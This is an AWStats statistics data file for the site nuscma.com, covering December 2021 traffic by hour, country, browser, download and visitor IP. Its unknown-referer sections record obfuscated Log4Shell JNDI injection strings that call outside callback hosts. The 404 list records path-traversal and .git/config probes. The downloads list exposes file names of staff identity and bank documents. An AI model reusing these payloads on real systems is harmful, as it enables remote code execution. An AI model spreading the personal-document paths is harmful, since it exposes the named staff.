AWSTATS DATA FILE 7.7 (build 20180105)
# If you remove this file, all statistics for date 202112 will be lost/reset.
# Last config file used to build this data file was /home2/nuscmy3y/tmp/awstats/ssl/awstats.nuscma.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2012                
POS_TIME 2691                
POS_VISITOR 20823               
POS_DAY 33279               
POS_DOMAIN 3608                
POS_LOGIN 4033                
POS_ROBOT 4188                
POS_WORMS 4828                
POS_EMAILSENDER 4959                
POS_EMAILRECEIVER 5102                
POS_SESSION 34124               
POS_SIDER 34337               
POS_FILETYPES 5237                
POS_DOWNLOADS 5530                
POS_OS 11399               
POS_BROWSER 11654               
POS_SCREENSIZE 13860               
POS_UNKNOWNREFERER 13934               
POS_UNKNOWNREFERERBROWSER 14957               
POS_ORIGIN 15888               
POS_SEREFERRALS 16035               
POS_PAGEREFS 16276               
POS_SEARCHWORDS 16424               
POS_KEYWORDS 16576               
POS_MISC 2355                
POS_ERRORS 16635               
POS_CLUSTER 3889                
POS_SIDER_404 16836               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220101015858 61 12230 16511852703627
FirstTime 20211201031251
LastTime 20211231213131
LastUpdate 20220101190337 61 0 60 0 0
TotalVisits 358                 
TotalUnique 297                 
MonthHostsKnown 0                   
MonthHostsUnknown 307                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
DirectorSupport 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
JavaEnabled 0 0 0
TotalMisc 0 0 0
FlashSupport 0 0 0
AddToFavourites 0 1 0
RealPlayerSupport 0 0 0
QuickTimeSupport 0 0 0
JavascriptDisabled 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 8 8 195782 34 49 159222
1 82 100 71637667 28 32 84784
2 212 352 28223723 48 100 1163518
3 164 209 2351298 68 157 631467
4 279 429 60651822 97 117 295846
5 891 1350 131436826 572 635 1314868
6 815 1138 238745468 173 210 475783
7 602 910 196582257 103 125 312605
8 388 602 15107241 403 428 1351771
9 2256 3530 77877748 548 589 2647206
10 545 866 68802614 110 143 644063
11 62 85 766406 47 111 1310436
12 310 496 123411889 1425 1461 6251408
13 515 691 62398188 119 148 282291
14 340 466 6272888 101 137 204927
15 107 187 62185073 70 107 282603
16 298 368 4424383 67 172 1906602
17 10 10 116386 36 73 336828
18 239 241 1706220 350 365 1205799
19 413 487 4507164 295 336 737332
20 1 3 4892 14 112 2266596
21 10 10 162700 15 25 201077
22 4 4 74734 33 46 175199
23 310 319 2728277 418 425 82908
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 13
in 4069 6140 209443639
us 3734 5612 644565109
ma 675 675 4650822
ru 273 273 1825484
ca 36 42 156230
gr 24 24 729548
il 22 25 99705
cn 12 22 923065
gb 6 6 31698
at 6 6 41652
ir 2 2 7572
lk 2 33 733740
id 0 1 76469
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 13
(firefox/)([0-9]\.|[0-1][0]\.) 1314 9286169 20211222181225 0
bingbot/ 313 3086612 20211231182740 0
Googlebot/ 305 2621981 20211231174327 0
baidu 213 5095612 20211231193114 0
oBot/ 40 158360 20211231221535 0
YandexBot/ 17 212154 20211231222529 0
Baiduspider/ 8 55032 20211231193109 0
no_user_agent 6 181246 20211230073710 0
bot[\s_+:,\.\;\/\\-] 6 182550 20211225220256 0
Dalvik/ 4 2332 20211207090710 0
Googlebot\-Image/ 2 4443 20211221160240 0
bingpreview 2 79176 20211226165256 0
java 1 0 20211224194807 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 11
Unknown 28 379816 0 0
js 144 14196761 0 0
txt 2 116 0 0
css 832 2612363 0 0
pdf 352 483611830 0 0
html 2874 21060786 0 0
mp4 6 152946134 0 0
png 405 30283216 0 0
php 5959 28404315 0 0
jpg 197 113503956 0 0
svg 2062 16285440 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 64
/Staff_Documents/Screenshot_20211228-153933_Other46c4d05080ec70ac30507b3531d54f2b.pdf 28 1 3325872
/Staff_Documents/tenth%20marksheet_Otherb93ad17a0b84ae79f3f963fd1557410f.pdf 11 1 5238964
/Staff_Documents/10%20&12_Otherc70149b25f3f434a2daaeea23bb272f8.pdf 9 3 756827
/Staff_Documents/Aadhar%20Card%20mom_Aadhar7b9168cfc94f1a1b35eb6e14d268e523.pdf 6 12 3762806
/Staff_Documents/IMG_20211229_140218_1%20(4)_Othere2fd41e5088ceb732eee9b589fe84915.pdf 6 6 990320
/Staff_Documents/IMG_20211019_191823_Otherdeaef1beb690503cd52379b3b1763d9d.pdf 6 0 691968
/Staff_Documents/IMG_20211229_140134_1%20(1)_Aadhar996fcf175401d4bd2fda4c32d4ac9137.pdf 6 8 975012
/Staff_Documents/PDF%20-%20B%20lit_Othera5ea458f04333acd4a0d1f6afb056775.pdf 6 4 5631768
/Staff_Documents/Scanned_20210802-1513_Aadhar4cf5f61d1ba545e904e5ff1bae79e9d4.pdf 5 18 9381168
/Staff_Documents/PDF-%20%20pan%20card_Other8d4fcddb6fc54960cc166fac8d89c597.pdf 5 8 5581738
/Staff_Documents/UG%20Provisional_Other3877855fdad07549e46423365beeb317.pdf 5 0 838685
/Staff_Documents/PDF%20-%20M.A_Otherf5e21c5cf942dff77bc48e6ff29df4c5.pdf 5 0 3463135
/Staff_Documents/documents_Aadhar767fcae420a318e6074a6419db696abd.pdf 5 0 13251240
/Staff_Documents/documents_Aadhar5e9b0ad76ddd1b9191122a29db4c552c.pdf 5 0 13251240
/Staff_Documents/IMG_20211229_072251%20(1)_transfer%20certificate21f0efa079ff5d66d35ccf55a070b933.pdf 5 11 875365
/Staff_Documents/Scanned_20210802-1505_Otheraa3fcf8ee47cddc9079bfc7defb9a476.pdf 5 35 25069034
/Staff_Documents/Scanned_20210802-1502_Otherdbb9c9cf902991ce3c445d1180be93da.pdf 5 25 22896625
/Staff_Documents/Vijay_transfer%20certificatebbb8cbe2c63ab91913880a4e133e5490.pdf 4 2 54547926
/Staff_Documents/PDF%20-%20D.T.Ed_Otherff066bf944bf4c6f6479828a8c4bb21b.pdf 4 0 3348936
/Staff_Documents/PDF-%2010th%20marksheet_Other00b2ef5a1fcdcf5311fdaa24a0649331.pdf 4 1 3869780
/Staff_Documents/IMG_202112361_184517108%20(1)_Other43c354ac3af34730c50f0a67331998f6.pdf 4 43 1533947
/Staff_Documents/aadhar_6_Aadhar9b919c6493b427faee4ccfbd710f7548.pdf 4 8 364101
/Staff_Documents/10th%20TC_transfer%20certificate031ac506229c3d3a9bf1a2d41142647d.pdf 4 4 2130554
/Staff_Documents/+2%20marksheet_Other26f67ce463058903f7d133ac9e5f3e1c.pdf 4 1 1915504
/Staff_Documents/IMG_202112363_185104067_Other1793f8fb42dc7db3558c3a859d1470db.pdf 4 12 288134
/Staff_Documents/PDF%20-%20bank%20pass%20book_Otherbe718645ca02171be329d4324d8da31a.pdf 4 7 2989162
/Staff_Documents/20211230_075323_Other1de09f7ffea8f2889d9b4a6dfa933696.mp4 4 14 33980870
/Staff_Documents/10%20&12_Otherc70149b25f3f434a2daaeea23bb272f8_Otherce5f73a285ea86f0223b5ee0f1deb566.pdf 4 0 310476
/Staff_Documents/IMG_202112361_183907627_Aadhar219fd95adafe7c5fcbbbf510ac6f94ef.pdf 4 46 936741
/Staff_Documents/DT%20Ed%20Certificate_Otherb002099f5d0f58fe1c9b03ea59472678.pdf 4 4 1766038
/Staff_Documents/Scanned_20210802-1515_Other59835708d4a11e541e748c42319c23dc.pdf 3 50 19198461
/Staff_Documents/Pan%20Card_Other005ce6dae9ef60be65b992367f93bd44.pdf 3 6 629886
/Staff_Documents/Document%2058_Aadhar08fff8e2c756738c995934d0d7ebc7e4.pdf 3 2 246485
/Staff_Documents/Photo_Other9a6f21570e7db1f31b3639e66d7a889b.pdf 3 6 143007
/Staff_Documents/M.kiruthika%20Document%20_Aadharf49c7a3ec915d200255f8a25bc376fef.pdf 3 83 213042322
/Staff_Documents/DocScanner%2030%20Dec%202021%2011.44%20am_Other34e2e639f103a74249160448b36dfd66.pdf 3 0 4593720
/Staff_Documents/IMG_202112361_184006309_d8551a9460a72d528531493f31a9da88.pdf 3 3 153208
/Staff_Documents/aa_Aadhar509a6c2f514c0b6555badf3711e3f90c.pdf 3 7 3257533
/Staff_Documents/Aadhaar%20Card_Aadhar96957dfa338d8657732fa567e49c6c82.pdf 3 5 1584694
/Staff_Documents/IMG_20211230_075735_c80abc2748f961dae7c73da8e0895033.pdf 3 0 402942
/Staff_Documents/IMG_20211229_105655%20(1)_Other8c94ff9346224f19d3bf76dc3e50a185.pdf 3 2 1844099
/Staff_Documents/Document%2056_Otherdd8315eb45f795892fb6c25fa5715d75.pdf 3 2 656813
/Staff_Documents/Indian%20bank%20passbook_Other79626c6bd7061f16155661dfa4859e6a.pdf 3 6 9057183
/Staff_Documents/20211230_073623%20(1)_Other70052890731f88fb4cd95aeedbe53e1a.pdf 3 17 1321535
/Staff_Documents/PDF%20-%20pan%20card%20R%20_Other0584700dfa722de64081e74be64b8471.pdf 3 3 2203290
/Staff_Documents/IMG_20211229_072558_Other576a995c2b7101ade10ab80db6273057.pdf 3 1 347158
/Staff_Documents/PDF-%2012th%20marksheet_Other3ca017f84d230974eb9423d0b128e1f5.pdf 3 1 3243757
/Staff_Documents/IMG_20211019_191837_Otherf7e2f164552406b9aed15271edd5e303.pdf 3 4 372940
/Staff_Documents/20211230_092136_Aadharc16160d33fcbf572bccef2902db5f262.pdf 3 18 269151
/Staff_Documents/Scanned_20210802-1506_Otherc63b1aa5bbc8245de2d1b5e75dc22a43.pdf 3 57 22991475
/Staff_Documents/IMG_202112361_184658411_0955c849db401e35d4946ebbb92fc689.pdf 3 0 72264
/Staff_Documents/IMG_202112363_184740361_b4ea6ba6e0feec8bc1d4fe76837d78fd.pdf 2 17 477765
/Staff_Documents/IMG_202112363_184935005_7e98f20fe2ad725d77ca7d427be58822.pdf 2 15 386447
/Staff_Documents/Document%2064_Other61a25352c6a46ff2d57e2b52679ea787.pdf 2 1 970008
/Staff_Documents/Document%2065_Other0d46c9c35f938e8cbdfb1f88e6251e6f.pdf 2 1 1334842
/Staff_Documents/10%20marksheet_Other32d16b5cfcc20b2154670582166ff803.pdf 2 1 1071942
/ads.txt 2 0 116
/Staff_Documents/IMG_202112363_184834097_Otherb2756986cf26b666d11d8f5720d66ccf.pdf 2 20 465704
/Staff_Documents/Document%2063_Otherfbafadc8348c4e7ddea8517c9a917406.pdf 2 1 1132020
/Staff_Documents/PDF%20-%20B.E%20provisional_Othere2cd6fa7da7ece17d355b9836906239e.pdf 2 1 1787026
/assets/videos/How%20to%20Make%20RC%20Airplane%20at%20Home%20-%20Very%20Simple.mp4 2 0 118965264
/Staff_Documents/IMG_20211230_093524_transfer%20certificated8ee8c7567a05f970efc621e1d5eb14b.pdf 1 1 145693
/Staff_Documents/IMG-20211230-WA0003_Aadhar0fa95c9a61e3e983709144abfaecea86.pdf 1 0 170075
/Staff_Documents/swetha_m_certificate_Aadhar806b60f7174d0a39d1c083b568cbcf0f.pdf 1 0 55319
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 13
win8.1 82 43
win2003 278 278
win7 387 255
win8 2 2
ios_iphone 33 2
linuxandroid 7676 4548
linux 364 359
winxp 1 0
Unknown 118 118
win10 3397 2317
macosx6 219 219
macosx9 3 2
macosx 906 718
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 98
firefox29.0 2 2
chrome38.0.1025.166 163 34
chrome84.0.4147.105 4 3
chrome80.0.3987.106 2 2
chrome4.0.213.1 178 178
chrome88.0.4324.190 1 0
msie11.0 4 4
chrome91.0.4472.77 59 29
nokia 7 0
chrome92.0.4515.131 866 525
chrome78.0.3904.108 3 0
opera10.00 3 2
firefox26.0 5 4
chrome31.0.1650.57 2 2
chrome83.0.4103.116 1 0
chrome86.0.4240.75 4 4
chrome91.0.4472.164 268 156
firefox82.0 1 0
firefox95.0 494 232
firefox96.0 390 201
safari 33 2
chrome74.0.3729.136 65 24
firefox73.0 1 0
chrome91.0.4472.0 2 2
chrome68.0.3440.106 4 4
firefox77.0 2 2
chrome79.0.3945.117 1 0
chrome95.0.4638.54 2 2
chrome88.0.4472.114 2 2
chrome96.0.4664.110 2252 1742
safari14.0.2 6 6
firefox81.0 2 2
chrome80.0.3987.163 2 2
chrome42.0.2311.90 4 4
chrome94.0.4606.85 141 105
chrome70.0.3538.110 275 189
chrome54.0 6 4
chrome96.0.4664.45 158 81
chrome93.0.4577.62 610 450
chrome83.0.4103.97 100 100
opera42.0.2393.94 34 34
firefox52.0 6 4
msie9.0 3 2
chrome90.0.4430.210 146 57
chrome88.0.4324.181 135 45
chrome70.0.3538.102 38 4
firefox63.0 33 2
chrome95.0.4638.74 256 154
firefox78.0 2 2
chrome87.0.4280.141 449 307
chrome65.0.3325.109 300 184
safari11.1 1 1
chrome89.0.4389.128 5 4
firefox83.0 3 2
firefox84.0 7 7
safari14.1.2 804 633
chrome75.0.3765.0 5 2
chrome49.0.2623.112 8 4
chrome96.0.4664.93 390 240
chrome31.0.1650.63 9 8
chrome73.0.3683.90 62 24
chrome92.0.4515.159 299 210
chrome51.0.2704.81 7 2
chrome95.0.4638.69 252 92
chrome90.0.4430.72 2 2
chrome95.0.4638.50 295 182
chrome58.0.3029.110 2 2
chrome79.0.3945.136 528 227
firefox79.0 2 2
chrome91.0.4472.114 4 4
opera11.11 4 2
Unknown 116 116
chrome91.0.4472.120 439 297
firefox76.0 1 0
chrome79.0.3945.74 3 2
firefox75.0 4 4
chrome91.0.4472.124 2 2
opera11.50 2 2
chrome83.0.4103.106 1 0
opera9.27 235 235
chrome84.0.4147.125 62 18
mozilla 2 2
firefox80.0 2 2
chrome32.0.1700.72 1 0
chrome96.0.4664.92 280 142
safari4.0.5 219 219
chrome62.0.3202.84 38 4
chrome77.0.3865.90 24 24
chrome96.0.4664.104 373 221
opera10.61 278 278
chrome87.0.4280.101 244 164
chrome90.0.4430.91 740 454
chrome87.0.4280.88 26 24
chrome85.0.4183.83 22 16
chrome59.0.3071.125 118 79
chrome89.0.4389.90 2 2
edge17 14 6
chrome80.0.3987.87 2 2
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hkzob4j5f4.interact.sh} 20211213220717
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tkqebn9oj6.interactsh.com} 20211211211116
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/nuscma.com} 20211214123505
Expanse_indexes_the_network_perimeters_of_our_customers._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com 20211231041736
Softaculous 20211210142821
panscient.com 20211208090643
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20211231213131
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20211213144740
lua-resty-http/0.10_(Lua)_ngx_lua/10019 20211213163927
ZaldomoSearchBot(www.zaldamo.com/search.html) 20211214121539
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 9
ZaldomoSearchBot(www.zaldamo.com/search.html) 20211214121539
lua-resty-http/0.10_(Lua)_ngx_lua/10019 20211213163927
panscient.com 20211208090643
Softaculous 20211210142821
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20211231213131
Expanse_indexes_the_network_perimeters_of_our_customers._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com 20211231041736
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/nuscma.com} 20211214123505
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hkzob4j5f4.interact.sh} 20211213220717
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tkqebn9oj6.interactsh.com} 20211211211116
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 1928 2075
From1 8 8
From2 546 547
From3 0 0
From4 6379 10836
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
www_google_co_in 4 4
www_google_com 538 538
www_google_com_hk 4 4
id_images_search_yahoo_com 0 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 0
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 10
504 1 167
302 1234 2795856
409 408 33864
500 20 0
301 142 33920
404 733 224557
421 1 322
403 2 716
406 1195 270070
400 11 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 79
/___proxy_subdomain_cpcalendars/.git/config 1 -
/index 2 -
/aeromodellingbasic.php 4 -
/501.shtml 2 -
/assets/icons/newicons/attendance%201.svg 1 -
/assets/images/python-icon.jpg 2 -
/staffs/assets/css/custom%20-%20Copy.css 3 https://www.nuscma.com/staffs/setpassword.php/
/assets/icons/newicons/student%201.svg 1 -
/assets/js/jquery.min.js 5 https://nuscma.com/admins/attendence/insertAttendence.php
/.git/config 4 -
/___proxy_subdomain_webdisk/ 2 http://www.google.com.hk
/assets/icons/newicons/exam.svg 1 -
/___proxy_subdomain_cpanel/robots.txt 5 -
/apple-touch-icon-precomposed.png 4 -
/staffs/assets/images/background.svg 1 https://www.nuscma.com/staffs/setpassword.php
/course-playlist.html 16 https://www.nuscma.com/aeromodellingBasic.php
/assets/icons/newicons/report.svg 1 -
/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash 1 -
/admins-2.1/login.php 2 -
/assets/icons/newicons/class%201.svg 1 -
/___proxy_subdomain_cpcontacts/robots.txt 5 -
/assets/icons/newicons/timetaple.svg 1 -
/staffs/assets/css/reset%20-%20Copy.css 3 https://www.nuscma.com/staffs/setpassword.php/
/___proxy_subdomain_cpanel/unprotected/loader.html 96 http://nuscma.com/
/___proxy_subdomain_webdisk/robots.txt 5 -
/___proxy_subdomain_cpcontacts/.git/config 1 -
/js/app.js 1 -
/terms.html 2 -
/400.shtml 1 -
/assets/icons/newicons/staff%201.svg 1 -
/___proxy_subdomain_webmail/robots.txt 5 -
/requestReset 2 -
/assets/icons/newicons/payroll.svg 1 -
/___proxy_subdomain_webmail/ 2 -
/.well-known/resource-that-should-not-exist-whose-status-code-should-not-be-200 8 -
/emergency.php 2 -
/___proxy_subdomain_webmail/resetpass 1 -
/settings/Download/student_bulkupload_formate.csv 4 https://nuscma.com/admins/settings/
/Staff_Documents/swetha_m_certificate_transfer%20certificate2792bc9b493cb85056d292a7ca8a1b9f.pdf 2 https://www.nuscma.com/admins/staffs/staffProfile.php
/staffs/login.php 14 https://www.nuscma.com/staffs/profile.php
/unprotected/loader.html 96 http://nuscma.com/
/Staff_Documents/swetha_m_certificate_transfer%20certificatee066fdeb18a63d22276025e0e80808fd.pdf 4 https://www.nuscma.com/admins/staffs/staffProfile.php
/restapi.php 4 -
/.well-known/change-password 8 -
/assets/icons/newicons/gl%20report.svg 1 -
/apple-touch-icon.png 4 -
/robots.txt 235 -
/assets/icons/newicons/transport.svg 1 -
/staffs/staffLogin.php 18 https://www.nuscma.com/staffs/setpassword.php/
/parentslogin.php 4 -
/assets/icons/newicons/nulinz-logo-1.svg 1 -
/___proxy_subdomain_cpcalendars/ 1 -
/assets/css/custom.css 9 https://www.nuscma.com/packages.php
/___proxy_subdomain_cpcalendars/robots.txt 5 -
/assets/css/media-queries.css 9 https://www.nuscma.com/packages.php
/privacy.html 24 https://www.nuscma.com/
/assets/icons/newicons/nuscma%20logo.svg 1 -
/assets/js/jquery-3.4.1.js 18 https://nuscma.com/franchise.php
/resetpass 1 -
/Staff_Documents/swetha_m_certificate_Other22b02a06e7adf34b4c557f7d9b3fdf9d.pdf 2 https://www.nuscma.com/admins/staffs/staffProfile.php
/staffs/resetPassword.php 4 https://www.nuscma.com/staffs/profile.php
/staffs/assets/java-script/jquery-3.4.1.js 3 https://www.nuscma.com/staffs/setpassword.php/
/cpnael 2 -
/admins/settings/logout.php 6 https://nuscma.com/admins/settings/
/stafflogin.php 4 -
/.vscode/ftp-sync.json 1 -
/assets/css/reset.css 9 https://www.nuscma.com/packages.php
/assets/icons/newicons/fees%20collection.svg 1 -
/.well-known/security.txt 4 -
/terms&policy.php 4 -
/login 2 -
/___proxy_subdomain_cpanel/ 1 -
/ 10 -
/staffs/assets/icons/newicons/Nuscma-tab-icon.svg 1 https://www.nuscma.com/staffs/setpassword.php
/requestreset.php 2 -
/assets/icons/newicons/libry.svg 1 -
/___proxy_subdomain_cpcontacts/ 2 -
/admins/login.php 12 -
/security.txt 2 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 307
45.227.254.4 397 397 2755974 20211220191134
106.198.126.119 363 416 1477700 20211228093936
106.197.123.28 357 390 8481250 20211230105845
157.49.248.160 319 359 2590646 20211230084007
45.227.254.6 278 278 1894848 20211230232103
194.165.16.19 269 269 1797716 20211222181637
223.181.245.96 218 224 1422386 20211230165304
106.197.123.31 216 324 2292482 20211225103715
157.46.107.64 212 416 190570828 20211230071648
106.198.121.33 205 474 2447142 20211228093407
106.211.255.159 196 251 58885627 20211230080001
106.217.3.145 176 352 4320389 20211229055732
157.51.148.140 170 221 1399928 20211228100219
106.211.255.162 166 204 802698 20211226065331
106.211.255.131 166 287 3427957 20211211132939
106.217.3.140 162 217 8606109 20211230055415
157.49.243.2 155 228 46094480 20211229103225
157.49.239.180 136 211 2426603 20211226145013
106.211.255.139 130 138 818339 20211220130836
157.49.226.127 128 161 802378 20211228093948
106.211.255.164 118 129 23125224 20211229053959
157.51.146.248 114 229 4429705 20211229140924
157.51.156.189 112 176 2462826 20211229093648
157.51.90.64 97 155 3676014 20211228100706
157.49.226.247 91 98 1000581 20211229135340
54.214.221.234 1 1 6942 20211215034353
34.213.46.212 2 2 13884 20211223034547
34.221.217.70 2 2 13632 20211229030816
34.210.244.74 2 2 13632 20211230043651
209.141.33.65 0 1 110484 
34.221.205.165 1 1 6942 20211223034711
157.46.112.49 24 25 79682 20211229041842
106.198.126.129 14 25 5009656 20211229122445
54.187.93.106 2 2 13884 20211217042828
157.49.255.148 21 24 135295 20211228054633
104.149.179.178 2 2 13884 20211223123719
54.148.33.26 1 1 6942 20211221035552
104.219.251.41 2 2 0 20211213203328
42.236.10.84 0 1 2446 
157.49.144.221 52 114 2431930 20211230063556
157.51.4.26 60 123 961143 20211225093402
106.197.44.18 10 21 289356 20211230045533
34.208.138.152 1 1 6942 20211220030504
157.49.145.68 22 41 651936 20211229044207
157.51.32.112 2 2 27128 20211204113652
34.86.35.8 2 2 60850 20211214093825
34.77.162.9 2 2 60198 20211231002918
172.58.33.179 2 6 127318 20211220121322
157.49.227.218 5 41 765363 20211228101448
54.187.122.178 1 1 6942 20211215034729
92.118.160.37 2 2 60850 20211206230640
106.197.109.59 19 57 828102 20211229072918
192.99.18.122 12 12 44898 20211226015402
52.33.250.58 2 2 13884 20211207034418
34.219.181.108 1 1 6942 20211208031716
34.86.35.7 2 2 60850 20211215003324
106.197.114.25 38 85 995235 20211228092954
34.96.130.27 2 2 60850 20211206234125
34.220.55.51 2 2 13884 20211202033536
223.182.228.174 6 15 177975 20211225071728
157.46.69.247 14 17 87275 20211229014742
106.222.112.132 24 62 1068175 20211230135455
157.46.108.144 24 41 67500875 20211228124927
18.236.128.103 1 1 6816 20211230045855
159.223.0.148 2 2 4722 20211228153116
64.233.172.66 8 51 660384 20211230064240
167.172.62.255 2 2 7572 20211223081910
42.106.185.220 19 24 135753 20211229092343
157.46.120.249 14 19 83981 20211230034906
106.197.104.173 55 82 462796 20211228092831
157.46.121.235 12 30 4320995 20211230084319
13.40.141.197 2 2 13884 20211215143834
216.10.252.159 2 2 60850 20211210142821
64.233.173.171 18 29 210281 20211230071259
82.80.230.228 22 25 99705 20211202145157
108.53.96.205 40 40 138316 20211208090643
64.233.173.174 29 39 356852 20211230064248
157.51.25.220 44 113 1360221 20211224054013
35.88.197.39 1 1 6942 20211215035134
54.89.231.12 12 85 1714870 20211224194304
92.118.160.5 4 4 121048 20211231213131
205.185.122.184 2 2 13632 20211228155212
54.148.177.31 1 1 6942 20211221034925
106.197.114.28 14 20 96679 20211228235107
54.218.160.197 1 1 6942 20211224030921
40.77.167.11 0 1 6942 
157.46.103.103 36 46 635056 20211228160156
106.211.208.123 57 72 3327829 20211230070331
3.237.199.191 2 2 60850 20211213163927
34.96.130.7 2 2 60850 20211218010618
35.85.53.37 2 2 13884 20211215035015
182.18.178.197 2 6 127318 20211220121338
54.189.52.36 2 2 13884 20211210035349
54.187.71.125 2 2 13884 20211226032701
171.13.14.76 2 5 134113 20211224075803
36.110.211.67 2 2 13884 20211202032727
35.88.39.205 1 1 6942 20211227033222
34.77.162.10 2 2 60850 20211224175745
106.211.255.133 43 80 961605 20211219154256
52.42.170.224 2 2 13884 20211222032422
223.187.114.200 31 69 963508 20211226072557
159.223.126.26 2 2 4986 20211223064808
34.219.135.123 2 2 13884 20211219031410
54.191.70.199 1 1 6942 20211208031818
159.223.8.243 2 2 3158 20211228132107
35.87.209.161 2 2 13884 20211218035318
223.182.225.107 18 48 4770465 20211230103146
106.211.198.207 2 7 129764 20211228090830
52.25.242.210 1 1 6942 20211215033854
54.244.152.73 2 2 13884 20211215033656
34.86.35.0 2 2 60850 20211228104746
34.213.178.18 1 1 6942 20211221035534
106.198.106.226 2 2 13884 20211228054818
157.49.235.235 13 50 880390 20211227165548
34.218.229.26 3 3 20826 20211221034854
34.211.49.193 2 2 13884 20211201031251
35.87.80.69 1 1 6942 20211205031707
157.49.248.95 52 100 12698069 20211228135750
157.46.123.176 82 121 11945563 20211228094902
157.49.209.136 18 29 3026910 20211230043306
106.211.255.169 29 66 868621 20211202080052
35.88.230.39 1 1 6942 20211210040240
36.110.211.66 2 2 13884 20211202032725
137.184.114.214 2 2 4136 20211228133351
157.49.199.161 62 74 1006051 20211229063155
209.141.41.193 4 5 30214 20211220074515
54.187.0.224 2 2 13884 20211224030901
106.197.45.43 50 57 294685 20211228121916
35.88.238.129 2 2 13884 20211214032736
157.49.226.56 72 75 526788 20211227092910
182.79.251.199 2 6 127318 20211228053402
157.49.221.184 78 120 752799 20211228094854
42.106.184.103 19 36 217048 20211228091700
54.69.39.164 2 2 13884 20211208031611
20.92.112.196 2 2 13632 20211229130231
34.77.162.20 2 2 60850 20211225010709
34.208.65.96 1 1 6942 20211215033909
106.198.126.115 2 6 37395 20211225094806
194.48.199.78 6 6 41652 20211214123506
54.218.54.248 2 2 13884 20211212030548
157.46.86.1 4 5 128632 20211227123428
137.184.234.23 4 4 24976 20211228194950
157.51.8.173 26 66 7571742 20211230103642
34.96.130.10 2 2 60850 20211203013624
92.118.160.9 4 4 121700 20211213060319
157.49.145.189 49 65 1364028 20211230060615
106.211.255.190 6 37 694108 20211213061015
34.86.35.6 2 2 60850 20211208030937
113.31.102.176 2 4 346498 20211216090619
54.204.165.165 2 3 16330 20211222082859
34.86.35.18 2 2 60850 20211220233603
92.118.160.61 4 4 121700 20211219062647
117.207.105.79 41 80 970861 20211228053737
64.233.173.177 24 32 313587 20211230071259
